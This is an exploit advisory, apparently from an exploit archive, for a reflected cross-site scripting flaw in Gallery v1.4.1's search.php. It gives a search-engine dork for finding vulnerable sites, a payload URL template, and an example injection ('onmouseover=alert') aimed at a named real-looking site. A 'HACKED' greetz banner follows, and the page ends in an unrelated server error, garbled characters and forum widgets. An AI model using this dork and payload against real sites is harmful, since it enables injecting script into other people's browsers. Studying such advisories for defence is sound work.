Gallery v1.4.1 == Cross Site Scripting - Web Application Security

linc0ln.dll

----------------------------------------------------------------------------
Exploit Title &#58; Gallery v1&#46;4&#46;1 == Cross Site Scripting
----------------------------------------------------------------------------

Author      &#58; linc0ln&#46;dll
Date        &#58; 23/06/11
Site        &#58; http&#58;//linc0ln&#46;pl/
@           &#58; linc0ln&#91;at&#93;e-o-u&#46;org
----------------------------------------------------------------------------

Description &gt;

Category    &#58; WebApps
Dork        &#58; \"Powered by Gallery v1&#46;4&#46;1\"
Vendor      &#58; http&#58;//gallery&#46;menalto&#46;com/
Tested On   &#58; Windows 7
----------------------------------------------------------------------------

XSS         &gt;

&gt;&gt; http&#58;//127&#46;0&#46;0&#46;1/&#91;path&#93;/search&#46;php?searchstring={XSS}
----------------------------------------------------------------------------

Example     &gt;

&gt;&gt; http&#58;//ftrgallery&#46;us/search&#46;php?searchstring=\"+onmouseover=alert(/xss/)+
----------------------------------------------------------------------------

\ \  / /                 /\
-HACKED-  \\{__}//      /((\
/ /  \ \   \|aa|/        ) )
_____vvvV__(oo)__Vvvv__(_(_
|            ``             |
|      &#46;&#58;&#58;Greetz To&#58;&#58;&#46;      |
| &#91;synthelyps&#46;c&#93;  &#91;fight3r&#93; |
| &#91;Mario_Vs&#93;      &#91;n1k0n3r&#93; |
| &#91;e-o-u&#46;org&#93;  &#91;Skynet Crew&#93;|
| And All The Other Friends |
|___________________________|
             ';;;;;(  )`
               \ \/ \ \//
              _/_/ _/ /
             vvvV^ Vvvv

Æ¬Ñ”Â¢É¦É¨É‡

The server encountered an unexpected condition which prevented it from fulfilling the request.
The script had an error or it did not produce any output. If there was an error, you should be able to see it in the error log.

Howdy, Stranger!

Top Posters

Who's Online (0)